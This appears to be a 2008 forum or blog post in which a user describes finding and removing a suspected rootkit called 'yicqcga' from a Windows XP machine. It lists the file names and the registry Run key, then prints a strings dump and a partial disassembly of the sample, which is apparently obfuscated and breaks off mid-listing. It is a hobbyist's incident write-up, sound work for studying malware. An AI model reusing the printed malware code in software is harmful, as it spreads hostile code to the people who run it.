Yicqcga running as a rootkit on XP?

huanix — Sun, 31 Aug 2008 04:36:16 +0000

I’m cleaning up a woefully undermaintained XP box for my dear friend Keirstin, and after doing all the basic spyware/anti-virus stuff I’m still getting clear signs of a deeper problem, so I begin digging for rootkits. I downloaded the free sophos rootkit tool and it came up with 5 related entries that didn’t show up anywhere on the internets. The entries are all called yicqcga, which I’m guessing is transmitting info to an ICQ somewhere (based soley on the name).

I think I am completely rid of yicqcga now (i think) – I used the free avg rootkit tool to rename it, then i deleted the reg key and the files, and i also removed it from startup in msconfig. I may sniff network traffic for awhile to be completely done – but i think it’s gone.

The registry entry is too long to copy, but looks like: \HKEY_USERS\[string]\Software\Microsoft\Windows\CurrentVersion\Run\yicqa

The four files all in application data are:

yicqga.exe
yicqga_nav.dat
yicq_navps.dat
yicqga.dat

I’ll drop these on a CD for grins, and maybe look at them later. I wonder if anyone else has seen these?

Update: I’m looking at some of the .dat files.. I haven’t figured out much yet, except that the string “YUTETN” appears repeatedly.

…-……u.VirtualAlloc….lstrlenA..

..GetCommModemStatus….RemoveDirectoryA….Eras

eTape.K.SuspendThread…_llseek…FindFirstFileA

….GetProfileIntA….GetSystemInfo.:.LCMapStrin

gA….WriteProcessMemory..s.DebugBreak….GetThr

eadContext….SetHandleCount….FindFirstFileExW

..^.TryEnterCriticalSection.w.GetModuleHandleA..

..SetConsoleMode….EnumTimeFormatsW..S.CreateIo

CompletionPort….FillConsoleOutputCharacterA…

GetUserDefaultLangID….PrepareTape…OutputDebu

gStringW..L.SwitchToFiber.H.GetDiskFreeSpaceW…

AllocConsole..:.GetCurrentProcess…lstrcpynA…

GetSystemTimeAsFileTime…ReadConsoleA..].Create

NamedPipeW..W.GetFileAttributesExA….ReadFile..

L.GetDriveTypeW…WriteConsoleOutputCharacterA..

{.VirtualProtect..M.LoadResource..KERNEL32.dll..

..ChangeClipboardChain….DestroyAcceleratorTabl

e.f.GetUserObjectInformationA.=.ChildWindowFromP

ointEx….ShowOwnedPopups.U.SetFocus..T.GetScrol

lBarInfo..g.SetProcessWindowStation…GetCursor.

..WaitForInputIdle….MessageBeep…GetCaretBlin

kTime…TrackMouseEvent.C.SetCapture….Broadcas

tSystemMessageW…MsgWaitForMultipleObjectsEx…

DialogBoxParamW…LoadBitmapW…RedrawWindow….

HideCaret…ToUnicode…OemToCharBuffW….Dialog

BoxParamA…GetDCEx…IntersectRect.f.SetProcess

DefaultLayout…CallWindowProcW.a.GetThreadDeskt

op..”.GetKeyboardLayout…wvsprintfW..[.GetSysCo

lorBrush....PeekMessageA....LoadCursorW.USER32.d

ll....CloseEnhMetaFile..S.UpdateColors....PlayEn

hMetaFile...GdiFlush....Ellipse...DeleteMetaFile

..GDI32.dll...RegDeleteKeyW...RegEnumKeyExW...Ac

cessCheck...CryptGetHashParam...CryptSetHashPara

m...RegEnumKeyW...MakeAbsoluteSD....AddAce..>.Is

ValidSid..>.CloseServiceHandle....RevertToSelf..

..RegSetValueA....RegSaveKeyA...AddAccessAllowed

Ace...GetFileSecurityA....RegCreateKeyW.>.StartS

erviceA.N.LookupPrivilegeValueW.9.IsTextUnicode.

1.SetSecurityDescriptorOwner....GetSecurityDescr

iptorControl....OpenSCManagerA....RegRestoreKeyW

..ADVAPI32.dll....ShellExecuteA.SHELL32.dll.X.Co

ResumeClassObjects....CoFileTimeNow.ole32.dll.OL

EAUT32.dll..9.ImageList_DragEnter.E.ImageList_Ge

tIcon.COMCTL32.dll..).PathFileExistsW...StrStrIW

.PathFindFileNameA...StrDupA...SHSetValueA...

SHRegGetUSValueW..%.PathCompactPathW..k.PathRemo

veExtensionW..SHLWAPI.dll..._exit.H._XcptFilter.

I.exit...._acmdln.X.__getmainargs..._initterm...

__setusermatherr...._adjust_fdiv..j.__p__commode

..o.__p__fmode....__set_app_type...._except_hand

ler3..MSVCRT.dll...._controlfp....GetStartupInfo

At the risk of an overkill, here's the disassembly of the executable yicqcga.exe

Disassembly of File: yicqcga.ex_

T.DateStamp = 44514643: Thu Apr 27 15:31:31 2006

Code Offset = 00001000, Code Size = 00001000

Data Offset = 00003000, Data Size = 0004B000

Number of Objects = 0003 (dec), Imagebase = 00400000h

Object01: .text RVA: 00001000 Offset: 00001000 Size: 00001000 Flags: 60000020

Object02: .rdata RVA: 00002000 Offset: 00002000 Size: 00001000 Flags: 40000040

Object03: .data RVA: 00003000 Offset: 00003000 Size: 0004B000 Flags: C0000040

+++++++++++++++++++ RESOURCE INFORMATION +++++++++++++++++++

There are no Resources in This Application.

+++++++++++++++++++ IMPORTED FUNCTIONS +++++++++++++++++++

Number of Imported Modules = 10 (decimal)

Import Module 001: KERNEL32.dll

Import Module 002: USER32.dll

Import Module 003: GDI32.dll

Import Module 004: ADVAPI32.dll

Import Module 005: SHELL32.dll

Import Module 006: ole32.dll

Import Module 007: OLEAUT32.dll

Import Module 008: COMCTL32.dll

Import Module 009: SHLWAPI.dll

Import Module 010: MSVCRT.dll

+++++++++++++++++++ IMPORT MODULE DETAILS +++++++++++++++++

Import Module 001: KERNEL32.dll

Addr:000027E4 hint(02AB) Name: ReadFile

Addr:000027F0 hint(014C) Name: GetDriveTypeW

Addr:00002800 hint(0393) Name: WriteConsoleOutputCharacterA

Addr:000027CC hint(0157) Name: GetFileAttributesExA

Addr:00002832 hint(024D) Name: LoadResource

Addr:000027B8 hint(005D) Name: CreateNamedPipeW

Addr:000027A8 hint(029F) Name: ReadConsoleA

Addr:0000278E hint(01C0) Name: GetSystemTimeAsFileTime

Addr:00002782 hint(03BC) Name: lstrcpynA

Addr:0000276E hint(013A) Name: GetCurrentProcess

Addr:0000275E hint(0009) Name: AllocConsole

Addr:0000274A hint(0148) Name: GetDiskFreeSpaceW

Addr:0000273A hint(034C) Name: SwitchToFiber

Addr:00002724 hint(0284) Name: OutputDebugStringW

Addr:00002716 hint(0289) Name: PrepareTape

Addr:000026FE hint(01DA) Name: GetUserDefaultLangID

Addr:000026E0 hint(00BE) Name: FillConsoleOutputCharacterA

Addr:000026C6 hint(0053) Name: CreateIoCompletionPort

Addr:000026B2 hint(00A8) Name: EnumTimeFormatsW

Addr:000026A0 hint(02F2) Name: SetConsoleMode

Addr:0000268C hint(0177) Name: GetModuleHandleA

Addr:00002672 hint(035E) Name: TryEnterCriticalSection

Addr:0000265E hint(00CB) Name: FindFirstFileExW

Addr:0000264C hint(0319) Name: SetHandleCount

Addr:00002638 hint(01CD) Name: GetThreadContext

Addr:0000262A hint(0073) Name: DebugBreak

Addr:00002614 hint(03A0) Name: WriteProcessMemory

Addr:00002604 hint(023A) Name: LCMapStringA

Addr:000025F4 hint(01BB) Name: GetSystemInfo

Addr:000025E2 hint(01A6) Name: GetProfileIntA

Addr:000025D0 hint(00C9) Name: FindFirstFileA

Addr:000025C6 hint(03AB) Name: _llseek

Addr:000025B6 hint(034B) Name: SuspendThread

Addr:000025AA hint(00AD) Name: EraseTape

Addr:00002596 hint(02BA) Name: RemoveDirectoryA

Addr:00002580 hint(0104) Name: GetCommModemStatus

Addr:00002574 hint(03BF) Name: lstrlenA

Addr:00002ED0 hint(01AF) Name: GetStartupInfoA

Addr:00002820 hint(037B) Name: VirtualProtect

Addr:00002564 hint(0375) Name: VirtualAlloc

Import Module 002: USER32.dll

Addr:000029BE hint(0214) Name: RedrawWindow

Addr:000029B0 hint(01B8) Name: LoadBitmapW

Addr:0000289E hint(003D) Name: ChildWindowFromPointEx

Addr:000028B8 hint(028E) Name: ShowOwnedPopups

Addr:000028CA hint(0255) Name: SetFocus

Addr:000028D6 hint(0154) Name: GetScrollBarInfo

Addr:000028EA hint(0267) Name: SetProcessWindowStation

Addr:00002882 hint(0166) Name: GetUserObjectInformationA

Addr:00002868 hint(0093) Name: DestroyAcceleratorTable

Addr:00002850 hint(001F) Name: ChangeClipboardChain

Addr:00002904 hint(0108) Name: GetCursor

Addr:00002910 hint(02CC) Name: WaitForInputIdle

Addr:00002924 hint(01DD) Name: MessageBeep

Addr:00002932 hint(00F4) Name: GetCaretBlinkTime

Addr:00002946 hint(02A2) Name: TrackMouseEvent

Addr:00002958 hint(0243) Name: SetCapture

Addr:00002966 hint(0014) Name: BroadcastSystemMessageW

Addr:00002980 hint(01ED) Name: MsgWaitForMultipleObjectsEx

Addr:000029CE hint(017F) Name: HideCaret

Addr:000029DA hint(02A0) Name: ToUnicode

Addr:000029E6 hint(01F2) Name: OemToCharBuffW

Addr:000029F8 hint(009E) Name: DialogBoxParamA

Addr:00002A0A hint(010D) Name: GetDCEx

Addr:00002A14 hint(0192) Name: IntersectRect

Addr:00002A24 hint(0266) Name: SetProcessDefaultLayout

Addr:00002A3E hint(001C) Name: CallWindowProcW

Addr:00002A50 hint(0161) Name: GetThreadDesktop

Addr:00002A64 hint(0122) Name: GetKeyboardLayout

Addr:00002A78 hint(02D8) Name: wvsprintfW

Addr:00002A86 hint(015B) Name: GetSysColorBrush

Addr:00002A9A hint(01FF) Name: PeekMessageA

Addr:0000299E hint(009F) Name: DialogBoxParamW

Addr:00002AAA hint(01BC) Name: LoadCursorW

Import Module 003: GDI32.dll

Addr:00002B10 hint(008E) Name: DeleteMetaFile

Addr:00002B06 hint(0094) Name: Ellipse

Addr:00002AFA hint(011B) Name: GdiFlush

Addr:00002AE8 hint(01E0) Name: PlayEnhMetaFile

Addr:00002AC4 hint(001C) Name: CloseEnhMetaFile

Addr:00002AD8 hint(0253) Name: UpdateColors

Import Module 004: ADVAPI32.dll

Addr:00002BD0 hint(020B) Name: RevertToSelf

Addr:00002C70 hint(0231) Name: SetSecurityDescriptorOwner

Addr:00002C60 hint(0139) Name: IsTextUnicode

Addr:00002CC0 hint(01F2) Name: RegRestoreKeyW

Addr:00002CAE hint(01AB) Name: OpenSCManagerA

Addr:00002B2C hint(01D1) Name: RegDeleteKeyW

Addr:00002B3C hint(01D7) Name: RegEnumKeyExW

Addr:00002B4C hint(0005) Name: AccessCheck

Addr:00002B5A hint(0099) Name: CryptGetHashParam

Addr:00002B6E hint(00A1) Name: CryptSetHashParam

Addr:00002B82 hint(01D8) Name: RegEnumKeyW

Addr:00002B90 hint(0196) Name: MakeAbsoluteSD

Addr:00002BA2 hint(0016) Name: AddAce

Addr:00002BAC hint(013E) Name: IsValidSid

Addr:00002BBA hint(003E) Name: CloseServiceHandle

Addr:00002C48 hint(014E) Name: LookupPrivilegeValueW

Addr:00002BE0 hint(01F8) Name: RegSetValueA

Addr:00002BF0 hint(01F3) Name: RegSaveKeyA

Addr:00002BFE hint(0010) Name: AddAccessAllowedAce

Addr:00002C14 hint(00EF) Name: GetFileSecurityA

Addr:00002C28 hint(01CF) Name: RegCreateKeyW

Addr:00002C38 hint(023E) Name: StartServiceA

Addr:00002C8E hint(0107) Name: GetSecurityDescriptorControl

Import Module 005: SHELL32.dll

Addr:00002CE0 hint(0107) Name: ShellExecuteA

Import Module 006: ole32.dll

Addr:00002CFC hint(0058) Name: CoResumeClassObjects

Addr:00002D14 hint(0018) Name: CoFileTimeNow

Import Module 007: OLEAUT32.dll

Addr:8000000F hint(000F) Name: OLEAUT32:NoName0000

Addr:80000014 hint(0014) Name: OLEAUT32:NoName0001

Addr:80000004 hint(0004) Name: OLEAUT32:NoName0002

Addr:800000C9 hint(00C9) Name: OLEAUT32:NoName0003

Addr:8000000C hint(000C) Name: OLEAUT32:NoName0004

Import Module 008: COMCTL32.dll

Addr:00002D52 hint(0045) Name: ImageList_GetIcon

Addr:00002D3C hint(0039) Name: ImageList_DragEnter

Import Module 009: SHLWAPI.dll

Addr:00002D92 hint(002C) Name: PathFindFileNameA

Addr:00002DA6 hint(00E5) Name: StrDupA

Addr:00002DB0 hint(00C9) Name: SHSetValueA

Addr:00002DBE hint(00B7) Name: SHRegGetUSValueW

Addr:00002DD2 hint(0025) Name: PathCompactPathW

Addr:00002DE6 hint(006B) Name: PathRemoveExtensionW

Addr:00002D74 hint(0029) Name: PathFileExistsW

Addr:00002D86 hint(0103) Name: StrStrIW

Import Module 010: MSVCRT.dll

Addr:00002EA2 hint(00CA) Name: _except_handler3

Addr:00002E90 hint(0081) Name: __set_app_type

Addr:00002E82 hint(006F) Name: __p__fmode

Addr:00002E72 hint(006A) Name: __p__commode

Addr:00002E62 hint(009D) Name: _adjust_fdiv

Addr:00002E4E hint(0083) Name: __setusermatherr

Addr:00002E42 hint(010F) Name: _initterm

Addr:00002E32 hint(0058) Name: __getmainargs

Addr:00002E28 hint(008F) Name: _acmdln

Addr:00002E20 hint(0249) Name: exit

Addr:00002E12 hint(0048) Name: _XcptFilter

Addr:00002E0A hint(00D3) Name: _exit

Addr:00002EC2 hint(00B7) Name: _controlfp

+++++++++++++++++++ EXPORTED FUNCTIONS +++++++++++++++++++

Number of Exported Functions = 0 (decimal)

+++++++++++++++++++ Possible Strings Inside Code Block +++++++++++++++++++

:004014FE....NullString..z,N`^

+++++++++++++++++++ DEBUG SYMBOLS LISTING +++++++++++++++++++

Trying to load with base = 00400000

ImageSize : 319488

NumSyms : 1

SymType : No symbols are loaded

ModuleName : yicqcga.ex_

ImageName : yicqcga.ex_

LoadedImageName : E:\yicqga\yicqcga.ex_

LoadedImageBase : 00400000

+++++++++++++++++++ ASSEMBLY CODE LISTING +++++++++++++++++++

//********************** Start of Code in Object CODE **************

Program Entry Point = 00401AB0 (yicqcga.ex_ File Offset:00001000)

=========

:00401000 8B442404 mov eax, dword[esp+04]

:00401004 83C0FE add eax, -002

:00401007 C3 ret

:00401008 90 90 90 90 90 90 90 90 ……..

=========

:00401010 8B4C2404 mov ecx, dword[esp+04]

:00401014 56 push esi

:00401015 8BC1 mov eax, ecx

:00401017 33D2 xor edx, edx

:00401019 BE101B942B mov esi, 2B941B10

:0040101E F7F6 div esi

:00401020 5E pop esi

:00401021 8BC2 mov eax, edx

:00401023 2BC1 sub eax, ecx

:00401025 0534178B06 add eax, 068B1734

:0040102A C3 ret

:0040102B 90 90 90 90 90 …..

=========

:00401030 8B442404 mov eax, dword[esp+04]

:00401034 48 dec eax

:00401035 0FAFC0 imul eax, eax

:00401038 C3 ret

:00401039 90 90 90 90 90 90 90 …….

=========

:00401040 8B442404 mov eax, dword[esp+04]

:00401044 8D48FF lea ecx, dword[eax-01]

:00401047 8BC1 mov eax, ecx

:00401049 C1E819 shr eax, 19

:0040104C C1E107 shl ecx, 07

:0040104F 0BC1 or eax, ecx

:00401051 C3 ret

:00401052 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………..

=========

:00401060 56 push esi

:00401061 8B742408 mov esi, dword[esp+08]

:00401065 57 push edi

:00401066 56 push esi

:00401067 E8C4FFFFFF call 00401030

:0040106C 8BC8 mov ecx, eax

:0040106E 8BC6 mov eax, esi

:00401070 33D2 xor edx, edx

:00401072 BFEA62F5BF mov edi, BFF562EA

:00401077 F7F7 div edi

:00401079 83C404 add esp, 004

:0040107C 5F pop edi

:0040107D 0FAFCA imul ecx, edx

:00401080 4E dec esi

:00401081 0FAFCE imul ecx, esi

:00401084 8BC1 mov eax, ecx

:00401086 5E pop esi

:00401087 C3 ret

:00401088 90 90 90 90 90 90 90 90 ……..

=========

:00401090 56 push esi

:00401091 8B742408 mov esi, dword[esp+08]

:00401095 57 push edi

:00401096 56 push esi

:00401097 E864FFFFFF call 00401000

:0040109C 56 push esi

:0040109D 8BF8 mov edi, eax

:0040109F E86CFFFFFF call 00401010

:004010A4 8BC8 mov ecx, eax

:004010A6 83C408 add esp, 008

:004010A9 0FAFCF imul ecx, edi

:004010AC 8BC1 mov eax, ecx

:004010AE 5F pop edi

:004010AF C1E01D shl eax, 1D

:004010B2 C1E903 shr ecx, 03

:004010B5 0BC1 or eax, ecx

:004010B7 5E pop esi

:004010B8 C3 ret

:004010B9 90 90 90 90 90 90 90 …….

=========

:004010C0 56 push esi

:004010C1 8B742408 mov esi, dword[esp+08]

:004010C5 8BC6 mov eax, esi

:004010C7 8BCE mov ecx, esi

:004010C9 C1E016 shl eax, 16

:004010CC C1E90A shr ecx, 0A

:004010CF 0BC1 or eax, ecx

:004010D1 8BCE mov ecx, esi

:004010D3 69C9D0C1519B imul ecx, 9B51C1D0

:004010D9 85C9 test ecx, ecx

:004010DB 7406 je 004010E3

:004010DD 33D2 xor edx, edx

:004010DF F7F1 div ecx

:004010E1 8BC2 mov eax, edx

———

:004010E3 8BCE mov ecx, esi

:004010E5 8BD6 mov edx, esi

:004010E7 C1E916 shr ecx, 16

:004010EA C1E20A shl edx, 0A

:004010ED 0BCA or ecx, edx

:004010EF 2BCE sub ecx, esi

:004010F1 5E pop esi

:004010F2 41 inc ecx

:004010F3 0FAFC8 imul ecx, eax

:004010F6 8BC1 mov eax, ecx

:004010F8 C1E819 shr eax, 19

:004010FB C1E107 shl ecx, 07

:004010FE 0BC1 or eax, ecx

:00401100 C3 ret

:00401101 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ……………

=========

:00401110 53 push ebx

:00401111 8B5C2408 mov ebx, dword[esp+08]

:00401115 8BC3 mov eax, ebx

:00401117 33D2 xor edx, edx

:00401119 B9D2D87A28 mov ecx, 287AD8D2

:0040111E 56 push esi

:0040111F F7F1 div ecx

:00401121 57 push edi

:00401122 53 push ebx

:00401123 8BF2 mov esi, edx

:00401125 E816FFFFFF call 00401040

:0040112A 8BD6 mov edx, esi

:0040112C 8BF8 mov edi, eax

:0040112E C1EA1C shr edx, 1C

:00401131 C1E604 shl esi, 04

:00401134 0BD6 or edx, esi

:00401136 53 push ebx

:00401137 0FAFFA imul edi, edx

:0040113A E821FFFFFF call 00401060

:0040113F 0FAFC7 imul eax, edi

:00401142 83C408 add esp, 008

:00401145 5F pop edi

:00401146 5E pop esi

:00401147 5B pop ebx

:00401148 C3 ret

:00401149 90 90 90 90 90 90 90 55 8B EC 83 EC 40 53 56 57 …….U….@SVW

:00401159 C7 45 DC 3A 4E 00 00 8B 45 DC 3D .E.:N…E.=

:00401164 C21900 ret 0019

:00401167 00 0F 87 D6 03 00 00 6E E8 34 C6 C6 00 AE B6 E6 …….n.4……

:00401177 00 48 54 60 F8 5A 98 F2 1C D4 1C BA 22 86 8A 9E .HT`.Z……”…

:00401187 72 EA 76 36 D0 EE F8 56 6C 0C 9A 82 00 F0 BA A0 r.v6…Vl…….

:00401197 36 88 A4 00 A0 00 12 A4 00 52 5A A0 24 D8 F8 00 6……..RZ.$…

:004011A7 32 00 FA F6 4A A4 00 6E 9E B6 00 62 00 FC 2…J..n…b..

:004011B5 6806A400EA push EA00A406

:004011BA 700C jo 004011C8

:004011BC 52 push edx

:004011BD 36B46A mov ah, 6A

:004011C0 26CE into

:004011C2 8A44F040 mov al, byte[eax+8*esi+40]

:004011C6 E000 loopne 004011C8

———

:004011C8 96 xchg eax, esi

:004011C9 00FE add dh, bh

:004011CB 180E sbb byte[esi], cl

:004011CD 98 cbw

:004011CE 42 inc edx

:004011CF 80C26E add dl, 6E

:004011D2 9C pushfd

:004011D3 0014FC add byte[esp+8*edi], dl

:004011D6 DA00 fiadd dword[eax]

:004011D8 187E00 sbb byte[esi+00], bh

:004011DB 0800 or byte[eax], al

:004011DD 16 push ss

:004011DE F8 clc

:004011DF 002470 add byte[eax+2*esi], ah

:004011E2 98 cbw

:004011E3 26C2946C ret 6C94

:004011E7 F6 00 50 16 C8 F6 00 DC 9E DA 72 D8 00 E2 42 C4 ..P…….r…B.

:004011F7 BA 9A A2 56 DA 80 40 5C 0C 56 A0 F6 62 6A 00 A6 …V..@\.V..bj..

:00401207 86 E8 00 34 30 FA 70 B4 00 64 00 A8 C4 00 3E 04 …40.p..d….>.

:00401217 16 98 A2 00 96 08 04 00 10 00 00 E0 00 DA 40 5A …………..@Z

:00401227 5E 00 1A B8 B4 00 1C D0 42 02 00 7C 74 D6 B6 36 ^…….B..|t..6

:00401237 4C DE 00 BE 00 00 74 6C 8E 0A 8E 26 50 3C A2 24 L…..tl…&P<.$

:00401247 E4 00 BC 68 00 EC 00 54 14 FC E2 00 D2 ...h...T.....

:00401254 3A004200 DWORD 0042003A ;; :.B.

:00401258 E4 2E B6 2C DE 44 02 5E FC 00 3A 00 42 BC D6 0E ...,.D.^..:.B...

:00401268 C0 00 9E CC 22 1C 00 00 7C 38 00 E2 1C 72 4E B8 ...."...|8...rN.

:00401278 4C A8 EC CC 50 3C A6 00 1C 2E 00 00 00 48 94 4C L...P<.......H.L

:00401288 A8 A2 0E 22 02 02 00 60 60 00 00 02 08 00 00 00 ..."...``.......

:00401298 AC lodsb

:00401299 304C82AC xor byte[edx+4*eax-54], cl

:0040129D B8FE24F4FC mov eax, FCF424FE

:004012A2 EE out port[dx], al

:004012A3 2480 and al, -80

:004012A5 50 push eax

:004012A6 D050D6 rcl byte[eax-2A], 1

:004012A9 F0 lock

:004012AA 0008 add byte[eax], cl

:004012AC 68005E52FE push FE525E00

:004012B1 16 push ss

:004012B2 006270 add byte[edx+70], ah

:004012B5 A2E6027280 mov byte[807202E6], al

:004012BA 04BA add al, -46

:004012BC 006E0A add byte[esi+0A], ch

:004012BF C21674 ret 7416

:004012C2 98 02 4E 4A 00 7C B8 1E 00 70 00 B4 00 FA 00 00 ..NJ.|...p......

:004012D2 FA 1A 00 84 70 00 56 40 50 BC 72 98 00 82 E8 B4 ....p.V@P.r.....

:004012E2 00 22 7C 00 84 E2 06 EA D6 32 32 00 DE 00 00 36 ."|......22....6

:004012F2 DC 82 B0 E4 B8 4A C4 34 00 B8 D6 00 3A 50 00 00 .....J.4....:P..

:00401302 32 AA 00 54 5C 50 18 22 3C A6 32 2E 94 E8 2A A8 2..T\P."<.2...*.

:00401312 60 C4 0A 78 A6 10 26 5E E2 1A 76 00 00 00 0E D4 `..x..&^..v.....

:00401322 A8 00 0A 70 FC 1A 26 1A 00 D6 F6 00 00 24 06 38 ...p..&......$.8

:00401332 96 FC 22 00 EE 00 DC 00 00 00 1A DC 00 FC 42 92 .."...........B.

:00401342 00 72 00 B4 22 82 6C 94 56 AC 00 00 FA 4E 34 CC .r..".l.V....N4.

:00401352 7C 20 D8 94 AE FC 00 40 32 E2 CE 04 88 60 3A A0 | .....@2....`:.

:00401362 A0 1C F6 7A 00 1E 00 0E 22 56 00 80 A8 DC 94 A2 ...z...."V......

:00401372 F6 24 00 7C 00 78 00 1A 00 FA 08 1A E8 00 28 84 .$.|.x........(.

:00401382 E0 88 2A 4C D8 00 04 16 5C A0 00 DA 2E B0 84 60 ..*L....\......`

:00401392 00 00 00 00 3C 14 04 E2 26 94 B8 A0 1E B0 2E 0E ....<...&.......

:004013A2 4C 1A 76 A2 72 60 AE 76 F0 74 FA BC 70 00 9A 6A L.v.r`.v.t..p..j

:004013B2 86 56 7C 00 B4 C0 00 00 94 8A 5A 6C E0 EA 5A 00 .V|.......Zl..Z.

:004013C2 4E 68 00 D0 92 8C C0 D8 00 64 24 38 2C A0 72 00 Nh.......d$8,.r.

:004013D2 FA DA 82 86 0A C0 EE 42 36 F2 00 00 FE 00 5C 8C .......B6.....\.

:004013E2 00 00 9C 00 00 8C 90 DA 00 CE 00 9C C4 84 9A 52 ...............R

:004013F2 7C 00 A4 CA 98 7E 80 0C 80 AA D4 84 A4 EC D4 F4 |....~..........

:00401402 CA 00 00 9A 1A E6 E0 76 00 42 36 00 98 00 00 16 .......v.B6.....

:00401412 E4 1A 00 AE 80 62 3C 1A AE 18 4A BC 7C 4A BC 38 .....b<...J.|J.8

:00401422 A2 00 6A FA F8 80 00 E4 00 78 82 60 B6 22 A2 76 ..j......x.`.".v

:00401432 E2 84 A6 FC CA D8 02 16 96 F0 B2 4E DE 00 9A 8A ...........N....

:00401442 5C 00 56 F2 00 9A 6E 00 00 EA 70 00 10 B4 22 0C \.V...n...p...".

:00401452 F2 .

:00401453 C200E0 ret E000

:00401456 54 32 2A 76 12 78 0E 1E 1E 38 22 38 00 5E FA F4 T2*v.x...8"8.^..

:00401466 00 F4 60 F4 ..`.

---------

:0040146A 006CE2AE add byte[edx-52], ch

:0040146E A6 cmpsb

:0040146F EA6E8840DE1600 jmp far 886E:0016DE40

:00401476 00 BE 56 00 64 DA C6 00 00 6E CA 12 2C 00 06 48 ..V.d....n..,..H

:00401486 36 A2 30 F0 AA CA 00 CE 00 00 0E 00 3E 00 F0 8A 6.0.........>…

:00401496 00 02 B0 00 00 86 32 D2 00 9C 00 00 B0 22 E4 00 ……2……”..

:004014A6 56 42 32 82 F4 58 F2 14 00 48 00 38 4E 80 72 00 VB2..X…H.8N.r.

:004014B6 00 88 C8 20 A8 00 BC 6A 98 E0 9E F8 42 26 14 5A … …j….B&.Z

:004014C6 00 88 BE 00 D4 6E 86 80 F2 BC 82 00 00 8E 84 00 …..n……….

:004014D6 00 CA 0A 1A E4 00 C6 9E F6 88 00 D8 1E EC D8 D0 …………….

:004014E6 AC 02 00 24 02 52 FE 96 D6 00 B2 F8 00 BC C2 00 …$.R……….

:004014F6 00 50 34 3A 0C 7C 00 00 .P4:.|..

:004014FE 7A 2C 4E 60 5E 00 ;;n “z,N`^”

:00401504 5A pop edx

:00401505 0E push cs

:00401506 00B256EC6A1C add byte[edx+1C6AEC56], dh

:0040150C 8E9ED81C0034 mov ds, word[esi+34001CD8]

:00401512 06 push es

:00401513 3626FC cld

:00401516 40 inc eax

:00401517 AA stosb

:00401518 38149A cmp byte[edx+4*ebx], dl

:0040151B FA cli

:0040151C 0000 add byte[eax], al

:0040151E 54 push esp

:0040151F C2008E ret 8E00

:00401522 5E 20 46 00 00 A6 46 BA 28 64 92 02 7E 68 90 84 ^ F…F.(d..~h..

:00401532 00 7A F2 22 00 1A 00 A2 00 98 00 64 A2 64 10 BA .z.”…….d.d..

:00401542 96 00 66 C1 E0 0E 80 E4 70 66 2B C9 2B C0 34 96 ..f…..pf+.+.4.

:00401552 34 A6 66 4.f

:00401555 81F1C22D2BC0 xor ecx, C02B2DC2

:0040155B 6683F100 xor cx, 000

:0040155F 33C8 xor ecx, eax

:00401561 6603C0 add ax, ax

:00401564 80E5CA and ch, -36

:00401567 C0E40A shl ah, 0A

:0040156A 80F14E xor cl, 4E

:0040156D 66B84200 mov ax, 0042

:00401571 668745F4 xchg word[ebp-0C], ax

:00401575 6681E9E200 sub cx, 00E2

:0040157A C0E508 shl ch, 08

:0040157D 66C1E916 shr cx, 16

:00401581 6633C0 xor ax, ax

:00401584 80E55A and ch, 5A

:00401587 66B8FC00 mov ax, 00FC

:0040158B 668745F6 xchg word[ebp-0A], ax

:0040158F 68BD924000 push 004092BD

:00401594 8F45E8 pop dword[ebp-18]

:00401597 2C0C sub al, 0C

:00401599 B300 mov bl, 00

:0040159B 865DFE xchg byte[ebp-02], bl

:0040159E 66B8B8E2 mov ax, E2B8

:004015A2 668745FA xchg word[ebp-06], ax

:004015A6 23C0 and eax, eax

:004015A8 662D36FA sub ax, FA36

:004015AC 66C1E805 shr ax, 05

:004015B0 C1E819 shr eax, 19

:004015B3 80F1F2 xor cl, -0E

:004015B6 80E43C and ah, 3C

:004015B9 66C1E01C shl ax, 1C

:004015BD 80E5A8 and ch, -58

:004015C0 33C8 xor ecx, eax

:004015C2 C1E81D shr eax, 1D

:004015C5 6681F12CD6 xor cx, D62C

:004015CA 66B9C267 mov cx, 67C2

:004015CE 66874DFC xchg word[ebp-04], cx

:004015D2 33C8 xor ecx, eax

:004015D4 C0E40A shl ah, 0A

:004015D7 6649 dec cx

:004015D9 B300 mov bl, 00

:004015DB 865DFF xchg byte[ebp-01], bl

:004015DE 6633C8 xor cx, ax

:004015E1 6633C9 xor cx, cx

:004015E4 66C1E01E shl ax, 1E

:004015E8 662BC0 sub ax, ax

:004015EB 8B4510 mov eax, dword[ebp+10]

:004015EE 50 push eax

:004015EF FF1518214000 call dword[00402118 ->00002574 lstrlenA]

;;call KERNEL32.lstrlenA

:004015F5 B26C mov dl, 6C

:004015F7 865513 xchg byte[ebp+13], dl

:004015FA 66C1E114 shl cx, 14

:004015FE 662BC8 sub cx, ax

:00401601 85C0 test eax, eax

:00401603 0F847C040000 je 00401A85

:00401609 33C9 xor ecx, ecx

:0040160B 66358800 xor ax, 0088

:0040160F 6648 dec ax

:00401611 662BC1 sub ax, cx

:00401614 D1E1 shl ecx, 1

:00401616 6603C9 add cx, cx

:00401619 6681E922BA sub cx, BA22

:0040161E C1E112 shl ecx, 12

:00401621 2C30 sub al, 30

:00401623 6603C0 add ax, ax

:00401626 662BC0 sub ax, ax

:00401629 6603C9 add cx, cx

:0040162C 664B dec bx

:0040162E 33C9 xor ecx, ecx

:00401630 6603C1 add ax, cx

:00401633 6681F1A200 xor cx, 00A2

:00401638 6633C0 xor ax, ax

:0040163B 23C9 and ecx, ecx

:0040163D 33C9 xor ecx, ecx

:0040163F 2BC9 sub ecx, ecx

:00401641 6603C0 add ax, ax

:00401644 33C0 xor eax, eax

:00401646 662BC8 sub cx, ax

:00401649 66C1E107 shl cx, 07

:0040164D B0E6 mov al, -1A

:0040164F 8645FE xchg byte[ebp-02], al

:00401652 33C1 xor eax, ecx

:00401654 6603C1 add ax, cx

:00401657 66C1E103 shl cx, 03

:0040165B 33C8 xor ecx, eax

:0040165D 349E xor al, -62

:0040165F 6A00 push 000

:00401661 8F45F0 pop dword[ebp-10]

:00401664 F75DF0 neg dword[ebp-10]

:00401667 C1E013 shl eax, 13

:0040166A C1E00E shl eax, 0E

:0040166D 2BC0 sub eax, eax

:0040166F 66B81445 mov ax, 4514

:00401673 668745F6 xchg word[ebp-0A], ax

:00401677 662BC8 sub cx, ax

:0040167A B1FE mov cl, -02

:0040167C 864D13 xchg byte[ebp+13], cl

:0040167F 6633C8 xor cx, ax

:00401682 2BC1 sub eax, ecx

:00401684 3416 xor al, 16

:00401686 66C1E803 shr ax, 03

:0040168A 6603C0 add ax, ax

:0040168D 33C8 xor ecx, eax

